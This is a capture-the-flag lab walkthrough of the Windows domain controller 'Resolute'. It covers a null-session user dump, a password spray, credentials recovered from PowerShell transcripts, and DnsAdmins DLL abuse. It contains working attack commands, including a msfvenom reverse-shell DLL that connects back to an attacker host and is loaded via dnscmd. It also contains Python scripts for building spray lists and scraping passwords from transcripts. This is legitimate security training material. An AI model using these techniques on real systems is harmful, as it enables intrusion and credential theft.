Resolute
IP: 10.10.10.169 | Difficulty: Medium | OS: Windows
Environment Setup
export IP=10.10.10.169
echo "10.10.10.169 resolute.megabank.local megabank.local" >> /etc/hosts
Step 1 — Port Scan
Why: Map the attack surface. Windows DC profile determines which protocols to enumerate first.
nmap -sC -sV -p- --min-rate 5000 -oN resolute.nmap 10.10.10.169
Output:
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP
445/tcp open microsoft-ds Windows Server 2016
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP
5985/tcp open http Microsoft HTTPAPI httpd 2.0
Key findings:
- Classic Windows DC profile — DNS, Kerberos, RPC, LDAP, SMB, WinRM all exposed
- WinRM on 5985 means valid credentials → instant shell if user is in Remote Management Users
Step 2 — RPC Null Session — User Enumeration
Why: The host allows a null session (anonymous SMB/RPC bind), so the SAMR pipe can be queried without credentials. Dump all domain users together with their description fields: admins frequently leave credentials in the description after provisioning accounts, and enumdomusers gives the user list for a later spray.
rpcclient -U "" -N 10.10.10.169 -c "enumdomusers"
rpcclient -U "" -N 10.10.10.169 -c "querydispinfo"
Output:
user:[Administrator] user:[ryan] user:[marko] user:[melanie] [+24 others]
index: 0xfb6 RID: 0x457 acb: 0x00000210 Account: marko
Description: Account created. Password set to Welcome123!
Key findings:
- marko has a plaintext password in the description field, a common post-provisioning mistake
- 26 total domain users enumerated → spray target list
- Password was likely never removed after account creation
Step 3 — Password Spray — melanie
Why: marko's credential is exposed but may have been changed since provisioning. Spray Welcome123! across all enumerated users: provisioning passwords are often reused or left unchanged on other accounts. Check the lockout policy first (crackmapexec smb 10.10.10.169 --pass-pol); one password across every user costs each account a single failed attempt, so a spray like this stays well under any sane threshold.
crackmapexec smb 10.10.10.169 -u users.txt -p 'Welcome123!' --continue-on-success
Output:
[-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE
...
[+] megabank.local\melanie:Welcome123!
Key findings:
- marko changed his password, but melanie never changed the provisioning default
- Valid foothold: melanie:Welcome123!
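Added example, not part of the original writeup: a small Python script that turns the rpcclient output from Steps 2 and 3 into a spray list. It parses querydispinfo (and enumdomusers) lines, flags descriptions that mention a password, drops disabled accounts (acb bit 0x1) so they do not burn lockout budget, and prints the remaining accounts one per line for crackmapexec -u users.txt. The sample output is constructed for the example: only marko's line mirrors the box; the other accounts, RIDs, names and descriptions are assumptions.

```python
import re
import sys

# Constructed sample, modelled on the tab-separated "Account: / Name: / Desc:"
# lines that rpcclient's querydispinfo prints. Only marko's line mirrors the
# writeup; the other RIDs, names and descriptions are made up for this example.
SAMPLE_DISPINFO = (
    "index: 0xfb6 RID: 0x457 acb: 0x00000210 Account: marko\tName: Marko Novak\t"
    "Desc: Account created. Password set to Welcome123!\n"
    "index: 0xfb7 RID: 0x458 acb: 0x00000210 Account: melanie\tName: \tDesc: \n"
    "index: 0xfb8 RID: 0x459 acb: 0x00000210 Account: ryan\tName: Ryan\tDesc: \n"
    "index: 0xdeb RID: 0x1f4 acb: 0x00000210 Account: Administrator\tName: \t"
    "Desc: Built-in account for administering the computer/domain\n"
    "index: 0xdec RID: 0x1f5 acb: 0x00000215 Account: Guest\tName: \t"
    "Desc: Built-in account for guest access to the computer/domain\n"
    "index: 0xe01 RID: 0x1f6 acb: 0x00000011 Account: krbtgt\tName: \t"
    "Desc: Key Distribution Center Service Account\n"
    "index: 0xe02 RID: 0x5a1 acb: 0x00000210 Account: svc_backup\tName: Backup Svc\t"
    "Desc: temp pwd: Backup2019! rotate after setup\n"
)

ACB_DISABLED = 0x0001  # SAMR account-control (acb) bit: account is disabled

# One querydispinfo line; Account, Name and Desc are separated by tabs.
LINE_RE = re.compile(
    r"index:\s*0x[0-9a-f]+\s+RID:\s*(?P<rid>0x[0-9a-f]+)\s+acb:\s*(?P<acb>0x[0-9a-f]+)"
    r"\s+Account:[ ]*(?P<account>[^\t]+)\tName:[ ]*(?P<name>[^\t]*)\tDesc:[ ]*(?P<desc>.*)",
    re.IGNORECASE,
)

# enumdomusers lines look like: user:[marko] rid:[0x457]
ENUM_RE = re.compile(r"user:\[(?P<account>[^\]]+)\]\s+rid:\[(?P<rid>0x[0-9a-f]+)\]", re.I)

# "Password set to X", "pwd: X", "pass = X" and similar description phrasings.
# The captured token is a candidate only; "Password expired" yields "expired".
HINT_RE = re.compile(
    r"\b(?:password|passwd|pwd|pass)\b\s*(?:set to|is|:|=)?\s*(?P<secret>\S+)",
    re.IGNORECASE,
)


def parse_dispinfo(text):
    """Parse querydispinfo output; lines that are not user entries are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        acb = int(m["acb"], 16)
        entries.append({
            "account": m["account"].strip(),
            "rid": int(m["rid"], 16),
            "acb": acb,
            "disabled": bool(acb & ACB_DISABLED),
            "name": m["name"].strip(),
            "desc": m["desc"].strip(),
        })
    return entries


def parse_enumdomusers(text):
    """Parse enumdomusers output into {account: rid}."""
    return {m["account"]: int(m["rid"], 16) for m in ENUM_RE.finditer(text)}


def password_hints(entries):
    """(account, candidate secret, full description) for each description that
    mentions a password. A human confirms the candidate before using it."""
    hints = []
    for e in entries:
        m = HINT_RE.search(e["desc"])
        if m:
            hints.append((e["account"], m["secret"], e["desc"]))
    return hints


def spray_targets(entries, skip=("krbtgt",)):
    """Enabled accounts worth spraying. Disabled accounts cannot log on and
    only consume lockout budget; krbtgt is never sprayed."""
    return sorted(
        e["account"] for e in entries
        if not e["disabled"] and e["account"].lower() not in skip
    )


if __name__ == "__main__":
    # Usage: rpcclient -U "" -N 10.10.10.169 -c querydispinfo | python3 spraylist.py > users.txt
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_DISPINFO
    users = parse_dispinfo(text)
    for account, secret, desc in password_hints(users):
        print(f"[!] {account}: {secret!r}  ({desc})", file=sys.stderr)
    print("\n".join(spray_targets(users)))
```

Hints go to stderr and the spray list to stdout, so the redirect into users.txt stays clean. The filename spraylist.py in the usage comment is an assumption.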
Step 4 — WinRM Foothold — melanie
Why: melanie is in Remote Management Users. WinRM gives us an interactive PowerShell session.
evil-winrm -i 10.10.10.169 -u melanie -p 'Welcome123!'
Output:
*Evil-WinRM* PS C:\Users\melanie\Desktop> whoami
megabank\melanie
Key findings: Shell obtained as melanie. user.txt on melanie's desktop.
Step 5 — PSTranscript Discovery — ryan's Password
Why: PowerShell transcription is enabled on this host, so every interactive command, including any password passed as a plaintext argument, is written to a transcript file. The transcript directory is hidden, so dir needs -Force to list it.
dir -force C:\
dir -force C:\PSTranscripts
dir -force C:\PSTranscripts\20191203
type C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
Output:
Directory: C:\PSTranscripts\20191203
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
...
>> cmd /c net use X: \\fs01\backups ryan <REDACTED>
...
Key findings:
- PSTranscripts directory is hidden (-arh--); -Force required to see it
- Admin ran net use interactively; the transcript captured the full command including ryan's plaintext password
- Lateral move ready: ryan:<REDACTED>
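Added example, not from the original writeup: a Python scanner for a transcript tree such as C:\PSTranscripts. It reads the transcript header (who ran the session, on which host) and flags the command shapes that carry plaintext credentials: the positional net use form seen on this box, the documented net use /user: forms, ConvertTo-SecureString -AsPlainText, and -Password style arguments. The embedded transcript is constructed for the example; the passwords, the second share and the svc_log account are made up, and the real password from the box is not reproduced.

```python
import os
import re
import sys

# Constructed transcript in the layout PowerShell transcription writes (header
# block, then "PS>" / ">>" command lines). Only the "net use X: \\fs01\backups ryan"
# shape mirrors the writeup; passwords, the logs share and svc_log are made up.
SAMPLE_TRANSCRIPT = r"""**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\Administrator
RunAs User: MEGABANK\Administrator
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: 2612
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Example_Pass_1"
>> $sec = ConvertTo-SecureString 'Example_Pass_2' -AsPlainText -Force
>> net use \\fs01\logs /user:MEGABANK\svc_log Example_Pass_3
>> Get-Date
**********************
Windows PowerShell transcript end
End time: 20191203064500
**********************
"""

HEADER_RE = re.compile(r"^(Username|RunAs User|Machine|Start time):\s*(.+)$", re.M)

TOKEN = r"[^\s\"']+"          # one argument, stopping at quotes
ARG = r"[^\s\"'/][^\s\"']*"   # an argument that is not a /switch

# Credential-bearing command shapes, tried in order; first match per line wins.
PATTERNS = [
    # documented order: net use \\srv\share <password> /user:<user>
    ("net use (password, /user:)", re.compile(
        r"net\s+use\s+\S+\s+(?P<secret>" + ARG + r")\s+/user:(?P<user>" + TOKEN + r")", re.I)),
    # net use \\srv\share /user:<user> <password>
    ("net use (/user:, password)", re.compile(
        r"net\s+use\s+\S+\s+/user:(?P<user>" + TOKEN + r")\s+(?P<secret>" + ARG + r")", re.I)),
    # the shape from this box: net use X: \\srv\share <user> <password>
    ("net use (positional)", re.compile(
        r"net\s+use\s+(?:[A-Za-z]:\s+)?\\\\\S+\s+(?P<user>" + ARG + r")\s+(?P<secret>" + ARG + r")", re.I)),
    # ConvertTo-SecureString '<password>' -AsPlainText
    ("ConvertTo-SecureString", re.compile(
        r"ConvertTo-SecureString\s+(?:-String\s+)?['\"](?P<secret>[^'\"]+)['\"].*-AsPlainText", re.I)),
    # -Password / -pw <password> on arbitrary tools
    ("-Password argument", re.compile(
        r"(?:-Password|-pw)\b\s+['\"]?(?P<secret>" + TOKEN + r")", re.I)),
]


def scan_transcript(text):
    """Return (header metadata, findings). Each finding records the line number,
    the command shape matched, the user (if the command named one) and the secret."""
    meta = {key: value.strip() for key, value in HEADER_RE.findall(text)}
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, rx in PATTERNS:
            m = rx.search(line)
            if m:
                findings.append({"line": lineno, "kind": kind,
                                 "user": m.groupdict().get("user"),
                                 "secret": m["secret"]})
                break
    return meta, findings


def scan_directory(root):
    r"""Walk a transcript tree such as C:\PSTranscripts and scan every .txt file."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".txt"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    results[path] = scan_transcript(fh.read())
    return results


if __name__ == "__main__":
    # Usage: python3 transcripts.py [directory]; with no argument the sample is scanned
    if len(sys.argv) > 1:
        scanned = scan_directory(sys.argv[1])
    else:
        scanned = {"<sample>": scan_transcript(SAMPLE_TRANSCRIPT)}
    for path, (meta, findings) in scanned.items():
        for f in findings:
            print(f"{path}:{f['line']} [{f['kind']}] run by {meta.get('RunAs User', '?')}: "
                  f"user={f['user']} secret={f['secret']}")
```

The positional pattern is deliberately last: in real net use syntax the token after the share is the password, so the /user: forms are matched first and the positional shape only catches lines like the one on this box. The filename transcripts.py is an assumption.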
Step 6 — WinRM as ryan — DnsAdmins
Why: ryan's credentials retrieved from the transcript. Authenticate and enumerate group memberships.
evil-winrm -i 10.10.10.169 -u ryan -p '<REDACTED>'
Output:
*Evil-WinRM* PS C:\Users\ryan\Desktop> whoami /groups
MEGABANK\DnsAdmins Alias Mandatory group, Enabled by default, Enabled group
Key findings:
- ryan is in DnsAdmins: members can configure the DNS service, including registering a server-level plugin DLL
- The DNS service runs as NT AUTHORITY\SYSTEM → the plugin DLL is loaded into that process at service start → SYSTEM
Step 7 — DnsAdmins Abuse — SYSTEM Shell
Why: DnsAdmins members can set ServerLevelPluginDll (HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters) to an arbitrary path, including a UNC path. When the DNS service next starts it loads that DLL inside its own process as SYSTEM; the DC fetches it as its machine account, so the share must accept anonymous access, which impacket-smbserver does by default. We generate a reverse-shell DLL, serve it over SMB, and register it via dnscmd. Two caveats: DnsAdmins membership alone does not grant the right to stop and start the DNS service (ryan has it on this box, as the sc.exe calls below show), and a plain msfvenom DLL does not implement the plugin interface, so the service never finishes starting and the DC's DNS stays down until the value is removed (reg delete HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll, then restart dns).
# Attacker — generate payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.X LPORT=4444 -f dll -o rev.dll
# Serve via impacket
impacket-smbserver share . -smb2support
# Listener
nc -lvnp 4444
On target as ryan:
dnscmd RESOLUTE /config /serverlevelplugindll \\10.10.14.X\share\rev.dll
sc.exe stop dns
sc.exe start dns
Output:
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
connect to [10.10.14.X] from [10.10.10.169] 49678
C:\Windows\system32> whoami
nt authority\system
Key findings:
- DLL loaded by the DNS service on restart; nothing beyond DnsAdmins membership and service-restart rights was needed
- root.txt at C:\Users\Administrator\Desktop\root.txt
- 🏴 MACHINE PWNED — SYSTEM ACHIEVED
Credentials
| Account | Password |
|---|---|
| melanie | Welcome123! |
| ryan | <REDACTED> |
Full Attack Chain
RPC null session → enumdomusers + querydispinfo
└─ marko description: "Password set to Welcome123!"
└─ Password spray all users → melanie:Welcome123!
└─ evil-winrm melanie → user.txt
└─ dir -force C:\ → hidden PSTranscripts directory
└─ transcript: net use ryan <password>
└─ evil-winrm ryan → DnsAdmins group
└─ dnscmd /config /serverlevelplugindll → UNC rev.dll
└─ sc stop/start dns → DLL loads as SYSTEM
🏴 ROOTED
© 0xNRG — Resolute pwned — 2020-05-30